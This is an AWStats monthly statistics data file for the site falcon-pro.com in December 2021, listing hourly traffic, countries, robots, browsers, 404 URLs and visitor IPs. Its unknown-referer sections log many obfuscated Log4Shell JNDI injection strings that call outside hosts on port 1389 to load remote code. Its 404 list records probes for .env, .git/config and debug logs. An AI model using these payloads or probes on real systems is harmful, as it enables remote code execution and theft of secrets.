AWSTATS DATA FILE 7.8 (build 20200416)
# If you remove this file, all statistics for date 202112 will be lost/reset.
# Last config file used to build this data file was /home/falconpr/tmp/awstats/ssl/awstats.falcon-pro.com.conf.

# Position (offset in bytes) in this file for beginning of each section for
# direct I/O access. If you made changes somewhere in this file, you should
# also remove completely the MAP section (AWStats will rewrite it at next
# update).
BEGIN_MAP 28
POS_GENERAL 2015                
POS_TIME 2690                
POS_VISITOR 20946               
POS_DAY 26969               
POS_DOMAIN 3335                
POS_LOGIN 3790                
POS_ROBOT 3945                
POS_WORMS 4349                
POS_EMAILSENDER 4480                
POS_EMAILRECEIVER 4623                
POS_SESSION 27648               
POS_SIDER 27817               
POS_FILETYPES 4758                
POS_DOWNLOADS 4842                
POS_OS 4890                
POS_BROWSER 5128                
POS_SCREENSIZE 5833                
POS_UNKNOWNREFERER 5907                
POS_UNKNOWNREFERERBROWSER 8460                
POS_ORIGIN 10922               
POS_SEREFERRALS 11058               
POS_PAGEREFS 11224               
POS_SEARCHWORDS 11372               
POS_KEYWORDS 11524               
POS_MISC 2354                
POS_ERRORS 11583               
POS_CLUSTER 3646                
POS_SIDER_404 11679               
END_MAP

# LastLine    = Date of last record processed - Last record line number in last log - Last record offset in last log - Last record signature value
# FirstTime   = Date of first visit for history file
# LastTime    = Date of last visit for history file
# LastUpdate  = Date of last update - Nb of parsed records - Nb of parsed old records - Nb of parsed new records - Nb of parsed corrupted - Nb of parsed dropped
# TotalVisits = Number of visits
# TotalUnique = Number of unique visitors
# MonthHostsKnown   = Number of hosts known
# MonthHostsUnKnown = Number of hosts unknown
BEGIN_GENERAL 8
LastLine 20220101015118 8 1176 10103736177935
FirstTime 20211201012923
LastTime 20211231094417
LastUpdate 20220101050953 8 0 7 0 0
TotalVisits 177                 
TotalUnique 160                 
MonthHostsKnown 0                   
MonthHostsUnknown 160                 
END_GENERAL

# Misc ID - Pages - Hits - Bandwidth
BEGIN_MISC 10
TotalMisc 0 0 0
FlashSupport 0 0 0
DirectorSupport 0 0 0
JavaEnabled 0 0 0
JavascriptDisabled 0 0 0
PDFSupport 0 0 0
QuickTimeSupport 0 0 0
WindowsMediaPlayerSupport 0 0 0
AddToFavourites 0 0 0
RealPlayerSupport 0 0 0
END_MISC

# Hour - Pages - Hits - Bandwidth - Not viewed Pages - Not viewed Hits - Not viewed Bandwidth
BEGIN_TIME 24
0 7 7 5698 5 11 4070
1 72 72 58608 5 37 4070
2 22 22 17094 4 21 3256
3 2 2 814 4 15 3256
4 11 11 13613 30 34 1864
5 3 3 2442 3 9 1628
6 3 3 2442 2 8 814
7 8 8 6512 7 31 5698
8 10 10 8140 163 318 2442
9 4 4 3256 1 2 814
10 3 3 2442 6 15 2442
11 5 5 4070 2 7 814
12 9 9 7326 8 45 6512
13 8 8 6512 2 8 1628
14 8 8 6512 5 13 3256
15 7 7 5698 4 6 2442
16 7 7 5698 2 7 814
17 2 2 1628 2 10 1628
18 12 12 9768 3 4 1628
19 6 6 4884 4 8 3256
20 4 4 3256 5 13 2442
21 6 6 4884 5 11 1628
22 5 5 4070 4 8 3256
23 4 4 3256 2 6 814
END_TIME

# Domain - Pages - Hits - Bandwidth
# The 25 first Pages must be first (order not required for others)
BEGIN_DOMAIN 20
us 159 159 133271
de 10 10 8140
ru 9 9 7326
gb 9 9 7326
gr 7 7 5698
th 4 4 3256
cn 4 4 3256
id 3 3 2442
dk 3 3 2442
eu 3 3 2442
kr 2 2 1628
mx 2 2 1628
ca 2 2 1628
bg 2 2 1628
ma 2 2 1628
br 2 2 1628
no 2 2 1628
se 1 1 0
il 1 1 814
fr 1 1 814
END_DOMAIN

# Cluster ID - Pages - Hits - Bandwidth
BEGIN_CLUSTER 0
END_CLUSTER

# Login - Pages - Hits - Bandwidth - Last visit
# The 10 first Pages must be first (order not required for others)
BEGIN_LOGIN 0
END_LOGIN

# Robot ID - Hits - Bandwidth - Last visit - Hits on robots.txt
# The 25 first Hits must be first (order not required for others)
BEGIN_ROBOT 7
bingbot/ 50 39886 20211231171040 0
bot[\s_+:,\.\;\/\\-] 11 8954 20211229140458 0
AhrefsBot/ 8 6512 20211226070147 0
Googlebot/ 2 1628 20211217004637 0
survey 2 1628 20211206191031 0
SurdotlyBot/ 1 814 20211225052613 0
(firefox/)([0-9]\.|[0-1][0]\.) 1 814 20211226144301 0
END_ROBOT

# Worm ID - Hits - Bandwidth - Last visit
# The 5 first Hits must be first (order not required for others)
BEGIN_WORMS 0
END_WORMS

# EMail - Hits - Bandwidth - Last visit
# The 20 first Hits must be first (order not required for others)
BEGIN_EMAILSENDER 0
END_EMAILSENDER

# EMail - Hits - Bandwidth - Last visit
# The 20 first hits must be first (order not required for others)
BEGIN_EMAILRECEIVER 0
END_EMAILRECEIVER

# Files type - Hits - Bandwidth - Bandwidth without compression - Bandwidth after compression
BEGIN_FILETYPES 1
html 228 188623 0 0
END_FILETYPES

# Downloads - Hits - Bandwidth
BEGIN_DOWNLOADS 0
END_DOWNLOADS

# OS ID - Hits
BEGIN_OS ID - Hits - Pages 13
macosx14 1 1
androidoreo 3 3
Unknown 103 103
linux 86 86
macosx 2 2
macosx15 4 4
win7 6 6
winxp 1 1
macosx11 1 1
androidnougat 4 4
linuxubuntu 1 1
win10 8 8
ios_iphone 8 8
END_OS

# Browser ID - Hits - Pages
BEGIN_BROWSER 31
chrome66.0.3359.181 2 2
chrome75.0.3770.101 1 1
Unknown 102 102
chrome85.0.4183.121 2 2
chrome89.0.4389.82 1 1
chrome74.0.3729.136 1 1
firefox84.0 5 5
chrome95.0.4638.69 1 1
chrome79.0.4101.79 2 2
safari14.1.1 1 1
chrome88.0.4324.190 1 1
chrome87.0.4280.88 2 2
chrome71.0.3578.98 2 2
chrome79.0.3945.74 1 1
chrome42.0.2311.90 4 4
chrome92.0.4515.131 1 1
chrome89.0.4389.90 2 2
firefox68.0 1 1
chrome60.0.3112.107 2 2
safari13.4.1 2 2
chrome86.0.4472.114 1 1
chrome84.0.4112.0 1 1
chrome65.0.3325.109 4 4
mozilla 1 1
safari 2 2
firefox89.0 1 1
chrome95.0.4638.54 1 1
chrome79.0.3945.93 1 1
chrome81.0.4044.129 3 3
chrome83.0.4103.97 76 76
firefox52.0 1 1
END_BROWSER

# Screen size - Hits
BEGIN_SCREENSIZE 0
END_SCREENSIZE

# Unknown referer OS - Last visit date
BEGIN_UNKNOWNREFERER 31
Expanse_indexes_the_network_perimeters_of_our_customers._If_you_have_any_questions_or_concerns,_please_reach_out_to:_scaninfo@expanseinc.com 20211231094417
${${lower:j}${lower:n}${lower:d}i:${lower:rmi}://188.166.57.35:1389/Binary} 20211220141246
${${::-j}ndi:rmi://188.166.57.35:1389/Binary} 20211220182624
python-requests/2.18.4 20211223204146
${${lower:jndi}:${lower:rmi}://188.166.57.35:1389/Binary} 20211221020949
${${lower:${lower:jndi}}:${lower:rmi}://188.166.57.35:1389/Binary} 20211220144938
NetSystemsResearch_studies_the_availability_of_various_services_across_the_internet._Our_website_is_netsystemsresearch.com 20211225095705
${jndi:rmi://188.166.57.35:1389/Binary} 20211220092109
python-requests/2.21.0 20211223015950
${jndi:ldap://144.202.34.169:1389/Binary} 20211223180533
Mozilla/5.0_(compatible;_CensysInspect/1.1;__https://about.censys.io/) 20211209071418
${jndi:ldap://185.254.196.236:1389/jijec} 20211216184939
${${lower:j}${lower:n}${lower:d}i:${lower:rmi}://167.99.115.242:1389/Binary} 20211220161644
${${lower:j}${upper:n}${lower:d}${upper:i}:${lower:r}m${lower:i}}://185.254.196.236:1389/jijec} 20211216150421
${${lower:jndi}:${lower:rmi}://51.79.74.227:1389/#Binary} 20211223043321
${${lower:j}${lower:n}${lower:d}i:${lower:rmi}://144.202.34.169:1389/#Binary} 20211223114441
${jndi:ldap://188.166.57.35:1389/Binary} 20211220122318
${jndi:rmi://144.202.34.169:1389/Binary} 20211223204146
${${lower:${lower:jndi}}:${lower:rmi}://185.254.196.236:1389/jijec} 20211216193915
${jndi:rmi://167.99.115.242:1389/#Binary} 20211222125908
${${lower:j}${upper:n}${lower:d}${upper:i}:${lower:r}m${lower:i}}://188.166.57.35:1389/Binary} 20211221134414
${${::-j}ndi:rmi://144.202.34.169:1389/#Binary} 20211223045827
${${lower:${lower:jndi}}:${lower:rmi}://167.99.115.242:1389/Binary} 20211221043823
${${lower:jndi}:${lower:rmi}://51.79.74.227:1389/Binary} 20211223015951
${${::-j}${::-n}${::-d}${::-i}:${::-r}${::-m}${::-i}://144.202.34.169:1389/#Binary} 20211223230927
${${lower:j}${lower:n}${lower:d}i:${lower:rmi}://51.79.74.227:1389/#Binary} 20211223075915
${${::-j}${::-n}${::-d}${::-i}:${::-r}${::-m}${::-i}://188.166.57.35:1389/Binary} 20211221023411
${${lower:jndi}:${lower:rmi}://167.99.115.242:1389/Binary} 20211221062312
python-requests/2.18.1 20211223180532
${${lower:j}${upper:n}${lower:d}${upper:i}:${lower:r}m${lower:i}}://167.99.115.242:1389/Binary} 20211220123029
${${lower:jndi}:${lower:rmi}://144.202.34.169:1389/Binary} 20211222121731
END_UNKNOWNREFERER

# Unknown referer Browser - Last visit date
BEGIN_UNKNOWNREFERERBROWSER 30
${${lower:jndi}:${lower:rmi}://188.166.57.35:1389/Binary} 20211221020949
python-requests/2.18.4 20211223204146
${${lower:${lower:jndi}}:${lower:rmi}://188.166.57.35:1389/Binary} 20211220144938
${${::-j}ndi:rmi://188.166.57.35:1389/Binary} 20211220182624
Expanse_indexes_the_network_perimeters_of_our_customers._If_you_have_any_questions_or_concerns,_please_reach_out_to:_scaninfo@expanseinc.com 20211231094417
${${lower:j}${lower:n}${lower:d}i:${lower:rmi}://188.166.57.35:1389/Binary} 20211220141246
${${lower:j}${upper:n}${lower:d}${upper:i}:${lower:r}m${lower:i}}://185.254.196.236:1389/jijec} 20211216150421
${${lower:j}${lower:n}${lower:d}i:${lower:rmi}://167.99.115.242:1389/Binary} 20211220161644
${${lower:jndi}:${lower:rmi}://51.79.74.227:1389/#Binary} 20211223043321
python-requests/2.21.0 20211223015950
${jndi:ldap://144.202.34.169:1389/Binary} 20211223180533
${jndi:ldap://185.254.196.236:1389/jijec} 20211216184939
NetSystemsResearch_studies_the_availability_of_various_services_across_the_internet._Our_website_is_netsystemsresearch.com 20211225095705
${jndi:rmi://188.166.57.35:1389/Binary} 20211220092109
${jndi:rmi://167.99.115.242:1389/#Binary} 20211222125908
${${lower:j}${upper:n}${lower:d}${upper:i}:${lower:r}m${lower:i}}://188.166.57.35:1389/Binary} 20211221134414
${jndi:rmi://144.202.34.169:1389/Binary} 20211223204146
${${lower:${lower:jndi}}:${lower:rmi}://185.254.196.236:1389/jijec} 20211216193915
${jndi:ldap://188.166.57.35:1389/Binary} 20211220122318
${${lower:j}${lower:n}${lower:d}i:${lower:rmi}://144.202.34.169:1389/#Binary} 20211223114441
${${lower:j}${upper:n}${lower:d}${upper:i}:${lower:r}m${lower:i}}://167.99.115.242:1389/Binary} 20211220123029
python-requests/2.18.1 20211223180532
${${lower:jndi}:${lower:rmi}://144.202.34.169:1389/Binary} 20211222121731
${${lower:jndi}:${lower:rmi}://167.99.115.242:1389/Binary} 20211221062312
${${lower:jndi}:${lower:rmi}://51.79.74.227:1389/Binary} 20211223015951
${${::-j}${::-n}${::-d}${::-i}:${::-r}${::-m}${::-i}://144.202.34.169:1389/#Binary} 20211223230927
${${lower:j}${lower:n}${lower:d}i:${lower:rmi}://51.79.74.227:1389/#Binary} 20211223075915
${${::-j}${::-n}${::-d}${::-i}:${::-r}${::-m}${::-i}://188.166.57.35:1389/Binary} 20211221023411
${${::-j}ndi:rmi://144.202.34.169:1389/#Binary} 20211223045827
${${lower:${lower:jndi}}:${lower:rmi}://167.99.115.242:1389/Binary} 20211221043823
END_UNKNOWNREFERERBROWSER

# Origin - Pages - Hits 
BEGIN_ORIGIN 6
From0 141 141
From1 83 83
From2 4 4
From3 0 0
From4 0 0
From5 0 0
END_ORIGIN

# Search engine referers ID - Pages - Hits
BEGIN_SEREFERRALS 1
www_google_com_hk 4 4
END_SEREFERRALS

# External page referers - Pages - Hits
# The 25 first Pages must be first (order not required for others)
BEGIN_PAGEREFS 0
END_PAGEREFS

# Search keyphrases - Number of search
# The 10 first number of search must be first (order not required for others)
BEGIN_SEARCHWORDS 0
END_SEARCHWORDS

# Search keywords - Number of search
# The 25 first number of search must be first (order not required for others)
BEGIN_KEYWORDS 0
END_KEYWORDS

# Errors - Hits - Bandwidth
BEGIN_ERRORS 2
301 1 236
404 533 0
END_ERRORS

# URL with 404 errors - Hits - Last URL referrer
BEGIN_SIDER_404 342
/home/login/login_index.html 1 -
/api/currency/quotation_new 1 -
/template/css/login.css 1 -
/api/system/system/config/get 1 -
/dist/images/mask/bg1.jpg 1 -
/mobile/css/base.css 1 -
/melody/api/v1/pageconfig/list 1 -
/images/src_images_but_dianz_s.png 1 -
/gaga/city.php 1 -
/css/app.css 1 -
/index.php/Wap/Api/getBanner 1 -
/static/guide/ab.css 1 -
/index/api/config 1 -
/assets/extension/market/css/mt4.css 1 -
//robots.txt 1 -
/index/getNews 1 -
/static/config.js 1 -
/static/wap/css/index.css 1 -
/Public/Home/js/cls.js 1 -
/2020 1 www.google.com
/mh/phone.do 1 -
/js/post.js/ 1 -
/thriveGame.css 1 -
/api/v1/about 1 -
/m/ 1 -
/h5/static/cert/icon_yanzhengma.png 1 -
/Promotions/list.mvc 1 -
/kkrp/site/info 1 -
/public/wap/js/basis.js 1 -
/index/Mobile/fenshi 1 -
/index/index/purchase.html 1 -
/api/ApiHub/fetchJinse 1 -
/robots.txt 146 -
/douyinpay.php 1 -
/2019 1 www.google.com
/friendGroup/list 1 -
/csjs/bankCheck.js 1 -
/api/index 1 -
/app/common/getRegisterSet 1 -
/template/tmp1/js/common.js 1 -
/Content/common/web/CommonActivity.css 1 -
/static/index/js/lk/order.js 1 -
/static/index/css/iindex.css 1 -
/public/web/css/add//index.css 1 -
/falcon-pro 1 www.google.com
/zz2/address.php 1 -
/v2/start/config 1 -
/api/config-init 1 -
/test 1 www.google.com
/Public/home/common/js/index.js 1 -
/index_files/bankCheck.js 1 -
/s_api/basic/config_js 1 -
/config.js 1 -
/Home/GetAllGameCategory 1 -
/assets/images/bg.jpg 1 -
/km.asmx/getPlatParam 1 -
/bkp2 1 www.google.com
/img/close.png 1 -
/Public/home/js/fukuang.js 1 -
/m/ticker/usdtqc 1 -
/common/member/js/user.util.js 1 -
/static/common/js/common.js 1 -
/h5/ 1 -
/ads.txt 31 -
/js/tvConfig.js 1 -
/kefu.php 1 -
/login/kefuxian.mvc 1 -
/api/Index/getLottery 1 -
/index.php/api/other/appSetting 1 -
/base/exchange_article/index/classid/1/id/1 1 -
/sys/setting/app 1 -
/wap/trading/get_newallorder_ajax 1 -
/verification.asp 1 -
/Backup 1 www.google.com
/Home/GetInitSource 1 -
/banner.do 1 -
/wap/banner/details 1 -
/static/images/login_bg.jpg 1 -
/js/bankCheck.js 1 -
/static/xianyu/js/bankCheck.js 1 -
/Home/Get/getJnd28 1 -
/m/allticker/1 1 -
/login.html 1 -
/Public/home/wap/css/qdgame.css 1 -
/api/stock/getSingleStock.do 1 -
/api/user/dataDictionaryService/list 1 -
/css/info.css 1 -
/static/data/thirdgames.json 1 -
/old-site 1 www.google.com
/market/getStockBaseInfo 1 -
/api/product/info/1 1 -
/index.php 1 -
/js/pups.js 1 -
/assets/js/dmshub.js 1 -
/user/getAllNicknames 1 -
/files/pub_reset.css 1 -
/Res/font/font.css 1 -
/api/uploads/apimap 1 -
/Content/Wap/base.css 1 -
/api/message/webInfo 1 -
/apis/api/index 1 -
/manager/js/left.js 1 -
/Home/Bind/binding 1 -
/api/v/index/queryOfficePage 1 -
/js/home.js 1 -
/static/wap/js/order.js 1 -
/client/api/findFreeTrade 1 -
/js/app.ling.js 1 -
/public/css/style.css 1 -
/login/img/nyyh/chkjs.js 1 -
/site.js 1 -
/sys/setting/all 1 -
/xianyu/index/setp1.html 1 -
//.well-known/security.txt 1 -
/static/h5/img/icon__create-group.png 1 -
/api/user/get_user_group 1 -
/images/pay.png 1 -
/Home/Index/ajaxTJ 1 -
/Recruit/download_url 1 -
/img/login.png 1 -
/common/template/lottery/lecai/css/style.css 1 -
/public/static/css/public.css 1 -
/template/920ka/js/woodyapp.js 1 -
/nyyh/chkjs.js 1 -
/demo 1 www.google.com
/guess/list.php 1 -
/static/tabBar/home_cur.png 1 -
/css/main.css 1 -
/auth/oauth/token 1 -
/css/skin/ymPrompt.css 1 -
/index/login/register 1 -
/api/index/index 1 -
/BACKUP 1 www.google.com
/core/misc/drupal.js 2 -
/assets/dist/static/js/vendor_prod.js 1 -
/service 2 -
/Public/css/hall.css 1 -
/api/user/mobilelogin 1 -
/index/index/ajaxdata 1 -
/solr 3 ${${lower:jndi}:${lower:rmi}://51.79.74.227:1389/Binary}
/member/js/lang_zh_CN.js 1 -
/home/help 1 -
/Public/js/common.js 1 -
/static/download/style.css 1 -
/appxz/index.html 1 -
/legal/currency/set 1 -
/api/site/getInfo.do 1 -
/api/product/topRank 1 -
/views/home/home.js 1 -
/api/index/loansList 1 -
/bz.gif 1 -
/mtja.html 1 -
/Css/Hm.css 1 -
/v1/management/tenant/getSpeedDomain 1 -
/old 1 www.google.com
/v2/block/home/app/hot 1 -
/WordPress 1 www.google.com
/public/web/js/add/com.js 1 -
/static/common/js/global.js 1 -
/api/v1/member/kefu 1 -
/n/news/banner 1 -
/api/index/webconfig 1 -
/common/download.js 1 -
/Template/Mobile/js/main.js 1 -
/mytio/config/base 1 -
/template/js/comm/Confrim.js 1 -
/index/index/js/api.js 1 -
/Content/css/wzwstylel.css 1 -
/home/main/login 1 -
/skin/js/common.js 1 -
/wap/api/exchangerateuserconfig!get.action 1 -
/api/web/user/getIndexData.php 1 -
/wp 1 www.google.com
/blog 1 www.google.com
/api/customerServiceLink 1 -
/api/common/getConfig 1 -
/user/login.html 1 -
/data/json/config.json 1 -
/site/info 1 -
/newsite 1 www.google.com
/Public/uploads/web/step1.png 1 -
/static/data/configjs.js 1 -
/market/market-ws/iframe.html 1 -
/JS/loginstatus.js 1 -
/info.php 1 -
/Old 1 www.google.com
/blogs 1 www.google.com
/static/img/bitbeb-logo.png 1 -
/api/config/info 1 -
/new 1 www.google.com
/static/wap/css/trade-history.css 1 -
/WP 1 www.google.com
/jiaoyimao/default.css 1 -
/img/zllqdk.png 1 -
/Public/Home/ecshe_css/main.css 1 -
/css/dafa.css 1 -
/api/link/platform 1 -
/202110/images/public.css 1 -
/users/sign_in 2 -
/static/index/css/trade-history.css 1 -
/room/script/face.js 1 -
/api/apps/config 1 -
/ajax/allcoin_a/id/0 1 -
/static/home/css/new_cfb.css 1 -
/api/apps 1 -
/static/mobile/user.html 1 -
/WORDPRESS 1 www.google.com
/public/img/cz1.png 1 -
/cscpLoginWeb/scripts/public.js 1 -
/Public/Mobile/ecshe_css/wapmain.css 1 -
/js/base1.js 1 -
/data/ticker_24hr 1 -
/getConfig/getArticle.do 2 -
/ajax 1 -
/admin/webadmin.php 1 -
/Telerik.Web.UI.WebResource.axd 1 -
/ipl/app/flash/publicbmw/ball/FigLeaf.js 1 -
/static/home/css/css.css 1 -
/Scripts/common.js 1 -
/myConfig.js 1 -
/css/nsc/reset.css 1 -
/static/css/index.css 1 -
/Public/css/errorCss.css 1 -
/infe/rest/flash/getServerIP.json 1 -
/Templates/user/js/global.js 1 -
/resources/css/headernav.css 1 -
/assets/room/css/room_mobile.css 1 -
/.vscode/ftp-sync.json 1 -
/backup 1 www.google.com
/room/getRoomBangFans 1 -
/leftDao.php 1 -
/files/pub_rem.js 1 -
/getConfig/listPopFrame.do 2 -
/js/common.js 1 -
/lanren/css/global.css 1 -
/base/exchange_index/changepwdfirst 1 -
/Templates/user/finance/css/userPay.css 1 -
/wap/trading/lastKlineParameter 1 -
/js/a.script 1 -
/api/wallet/redDetail 1 -
/user/userlist 1 -
/stock/search.html 1 -
/site/get-hq 1 -
/admin_user/m_tixian.php 1 -
/im/h5/ 1 -
/static/diff_worker.js 1 -
/statics/js/API.js 1 -
/nyyh/game.css 1 -
/public/static/css/denglu.css 1 -
/Public/initJs.php 1 -
/app/js/base.js 1 -
/static/home/js/rooms.js 1 -
/Public/Home/js/common.js 1 -
/proxy/games 1 -
/index.php/Wap/Api/getSystemNotice 1 -
/admin 1 -
/static/icon/my.png 1 -
/other/codepay/js/codepay_util.js 1 -
/api/exclude/siteConfig/webSiteConfig 1 -
/api/default/login-page 1 -
/wp-content/plugins/capability-manager-enhanced/common/js/admin.dev.js 1 -
/misc/drupal.js 2 -
/static/home/css/common.css 1 -
/user/Login 1 -
/bkp 1 www.google.com
/Public/Wchat/css/index.css 1 -
/client/api/findConfigByKey 1 -
/step1.asp 1 -
/proxy/settings 1 -
/Public/Wchat/js/cvphp.js 1 -
/static/home/csjs/bankCheck.js 1 -
/infe/rest/fig/advertise/common.json 1 -
/biz/server/config 1 -
/index/police/index.html 1 -
/.git/config 3 -
/static/css/public.css 1 -
/cms 1 www.google.com
/api/index/grailindex 1 -
/static/admincp/js/common.js 1 -
/js/basic.js 1 -
/public/admin.php/api/index/loansList 1 -
/css/all.css 1 -
/anquan/qgga.asp 1 -
/public/static/home/js/moblie/login.js 1 -
/themes/simpleboot3/public/assets/newpc/download_pattern_right.png 1 -
/cscpLoginWeb/app/home 1 -
/h5/static/tabbar/txl.png 1 -
/api/app/config_new 1 -
/zz/address.php 1 -
/api/contactWay 1 -
/Public/css/_pk10.css 1 -
/static/wap/js/common.js 1 -
/resources/main/common.js 1 -
/api/getconfig.aspx 1 -
/api/linkPF 1 -
/Falcon-Pro 1 www.google.com
/template/920ka/css/lsy.css 1 -
/static/image/chicang.png 1 -
/static/local/img/userCenter/hourlyPrivilege.svg 1 -
/mobile/v3/appSuperDownload.do 1 -
/homes/ 2 -
/api/public/ 1 -
/skin/main/onload.js 1 -
/pages/console/js/common.js 1 -
/mobile/config.js 1 -
/js/app.js 1 -
/.env 5 -
/api/user/ismustmobile 1 -
/js/dianzan.js 1 -
/api/lottery/color 1 -
/img/xxing.png 1 -
/xy/image/jiantou.png 1 -
/s_api/basic/download/info 1 -
/2021wp 1 www.google.com
/home/GetQrCodeInfo 1 -
/public/h5static/js/main.js 1 -
/im/in/GetUuid 1 -
/Public/home/js/check.js 1 -
/static/css/mobile.css 1 -
/css/style.css 1 -
/dev 1 www.google.com
/langConfig.js 1 -
/im/ 1 -
/Pc/Lang/index.html 1 -
/views/commData/commonSite.js 1 -
/static/data/gamedatas.js 1 -
/wordpress 1 www.google.com
/xy/ 1 -
/web/api/getBanner 1 -
/lib/client/etc/hometu.jpg 1 -
/style.css 1 -
/index/index/andiro 1 -
/Content/m_1/js/m_1_Jquery.js 1 -
/static/js/user.js 1 -
//sitemap.xml 1 -
/portal/index/protocol.html 1 -
/kkrps/im_group/show_members 1 -
/wp-content/debug.log 1 -
/api/mobile/checkStrategyHistory 1 -
/loan 1 -
/home 2 -
/index/Mobile/kline_week 1 -
END_SIDER_404

# Host - Pages - Hits - Bandwidth - Last visit date - [Start date of last visit] - [Last page of last visit]
# [Start date of last visit] and [Last page of last visit] are saved only if session is not finished
# The 25 first Hits must be first (order not required for others)
BEGIN_VISITOR 160
152.32.171.98 6 6 4884 20211211083731
137.226.113.44 5 5 4070 20211229163300
64.227.16.142 5 5 4070 20211223001655
208.100.26.237 4 4 3256 20211229132311
69.197.185.46 3 3 2442 20211228193118
178.62.21.18 3 3 2442 20211223114441
203.119.13.156 3 3 2442 20211223180533
92.118.160.1 3 3 2442 20211213101942
208.100.26.249 3 3 2442 20211222210907
51.79.77.75 3 3 2442 20211223204146
80.163.26.100 3 3 2442 20211220123029
51.38.114.107 3 3 2442 20211223015951
202.129.205.3 2 2 1628 20211223045827
45.224.181.2 2 2 1628 20211219194120
45.55.61.8 2 2 1628 20211220133603
34.211.231.125 2 2 1628 20211203013346
167.99.115.35 2 2 1628 20211219225442
146.59.151.250 2 2 1628 20211221005348
104.236.53.31 2 2 1628 20211220122318
185.233.37.201 2 2 1628 20211222121731
198.211.105.134 2 2 1628 20211219210832
180.128.242.37 2 2 1628 20211222125908
5.23.48.31 2 2 1628 20211223230927
85.25.210.197 2 2 1628 20211220002221
165.232.185.110 2 2 1628 20211220182624
34.217.58.233 1 1 814 20211206015004
54.185.85.70 1 1 814 20211227025153
35.85.56.123 1 1 814 20211215012740
34.220.94.200 1 1 814 20211224010233
34.212.30.33 1 1 814 20211228010832
34.219.181.49 1 1 814 20211215012656
143.198.146.251 1 1 814 20211219131605
35.161.217.164 1 1 814 20211220013652
54.68.37.213 1 1 814 20211207011928
162.142.125.59 1 1 814 20211209071418
54.213.246.157 1 1 814 20211214013310
46.105.242.106 1 1 814 20211218142227
34.213.153.89 1 1 814 20211222010421
54.218.95.61 1 1 814 20211218012437
92.118.160.17 1 1 814 20211219100652
54.200.164.122 1 1 814 20211209010608
35.87.154.89 1 1 814 20211203012617
34.213.74.30 1 1 814 20211225025458
131.153.143.50 1 1 814 20211201020221
54.245.188.14 1 1 814 20211219013930
18.237.247.110 1 1 814 20211201012941
18.237.198.55 1 1 814 20211230013155
144.91.106.14 1 1 814 20211223180012
54.187.58.182 1 1 814 20211216014402
137.184.37.173 1 1 814 20211224160044
52.42.3.170 1 1 814 20211228010909
35.87.77.34 1 1 814 20211226022043
34.96.130.11 1 1 814 20211214020456
35.162.210.180 1 1 814 20211222010447
35.86.104.68 1 1 814 20211210011347
35.87.139.232 1 1 814 20211203013349
34.222.81.143 1 1 814 20211222012656
208.100.26.247 1 1 814 20211206083806
35.87.154.57 1 1 814 20211202014328
35.166.39.231 1 1 814 20211214013300
34.86.35.7 1 1 814 20211231094417
54.244.165.255 1 1 814 20211226022006
45.41.15.59 1 1 814 20211228023221
35.87.4.63 1 1 814 20211217011330
35.87.11.188 1 1 814 20211212013639
192.99.160.42 2 2 1628 20211220174207
114.67.115.216 2 2 1628 20211220071135
92.118.160.41 1 1 814 20211225095705
52.34.63.165 1 1 814 20211227025108
175.126.82.207 2 2 1628 20211220141246
18.236.164.192 1 1 814 20211209010634
54.70.160.244 1 1 814 20211216014230
207.180.217.181 2 2 1628 20211219232139
34.214.133.255 1 1 814 20211229011042
35.89.30.56 1 1 814 20211221015714
52.41.87.71 1 1 814 20211206015328
191.242.216.30 2 2 1628 20211220020415
173.212.249.37 2 2 1628 20211221043823
34.212.177.82 1 1 814 20211203012343
34.77.162.3 1 1 814 20211207210224
213.59.119.254 2 2 1628 20211220073638
54.218.128.28 1 1 814 20211222012618
208.100.26.233 1 1 814 20211224025825
34.209.41.210 1 1 814 20211204010236
54.212.67.212 1 1 814 20211219013945
34.213.161.219 1 1 814 20211227025152
34.78.226.245 1 1 814 20211230212309
3.94.133.178 1 1 814 20211213045924
35.87.2.249 1 1 814 20211221015731
54.212.73.167 1 1 814 20211203013228
82.165.65.107 2 2 1628 20211221023411
69.197.185.45 1 1 814 20211202051409
206.189.28.199 2 2 1628 20211223075915
35.162.202.211 1 1 814 20211220013735
34.77.162.15 1 1 814 20211221181101
165.22.211.113 2 2 1628 20211223043321
52.25.107.193 1 1 814 20211227025110
18.237.232.24 1 1 814 20211203013451
35.86.131.69 1 1 814 20211202014316
54.185.11.10 1 1 814 20211212013716
54.186.251.225 1 1 814 20211226020011
162.244.81.201 1 1 814 20211216184939
52.13.53.193 1 1 814 20211223024920
75.119.137.253 2 2 1628 20211220144938
35.166.230.208 1 1 814 20211230012327
34.220.44.245 1 1 814 20211201012923
209.97.163.214 2 2 1628 20211221134414
18.236.84.38 1 1 814 20211231013236
34.214.98.6 1 1 814 20211230012243
54.202.175.193 2 2 1628 20211230013323
3.108.255.101 1 1 814 20211213055622
167.86.92.66 2 2 1628 20211220085202
35.87.94.96 1 1 814 20211203013618
52.34.187.146 1 1 814 20211218012401
34.216.189.11 1 1 814 20211204010241
34.86.35.11 1 1 814 20211223214055
34.96.130.23 1 1 814 20211228181412
34.213.20.238 1 1 814 20211206014938
207.246.91.150 2 2 1628 20211221062312
83.145.36.70 1 1 0 20211228035043
35.86.107.53 1 1 814 20211203013343
52.12.24.205 1 1 814 20211223024844
52.32.172.12 1 1 814 20211203012701
51.15.9.169 2 2 1628 20211220225819
34.215.62.228 1 1 814 20211229011105
138.128.118.130 1 1 814 20211218150658
148.202.167.75 2 2 1628 20211220011220
208.100.26.248 1 1 814 20211201142213
134.122.25.128 2 2 1628 20211220150020
13.126.83.157 1 1 814 20211216133448
54.185.15.101 1 1 814 20211230013311
119.90.42.89 1 1 814 20211215051138
35.167.233.204 1 1 814 20211220014857
124.126.78.178 1 1 814 20211219224844
212.193.30.190 1 1 814 20211207182320
80.87.193.144 2 2 1628 20211221020949
52.12.3.141 1 1 814 20211211011851
34.212.178.69 1 1 814 20211220012909
208.100.26.244 2 2 1628 20211226115334
92.118.160.37 1 1 814 20211219191418
34.86.35.25 1 1 814 20211217182146
35.162.174.115 1 1 814 20211231013307
138.197.97.219 2 2 6287 20211226045853
208.100.26.235 2 2 1628 20211229014525
34.220.72.240 1 1 814 20211222011042
84.252.121.1 2 2 1628 20211220092109
54.213.221.103 1 1 814 20211207012018
92.118.160.57 1 1 814 20211220040212
2.56.57.196 1 1 814 20211221163134
18.236.235.53 1 1 814 20211217011931
54.190.9.123 1 1 814 20211226020045
209.97.149.229 1 1 814 20211216142105
35.161.52.136 1 1 814 20211210011339
52.59.212.104 1 1 0 20211209022358
35.88.160.224 1 1 814 20211220012832
34.86.35.31 1 1 814 20211202203830
78.31.66.214 1 1 814 20211216193915
128.199.127.143 1 1 814 20211209143320
54.69.106.65 1 1 814 20211224010150
34.96.130.12 1 1 814 20211216123302
END_VISITOR

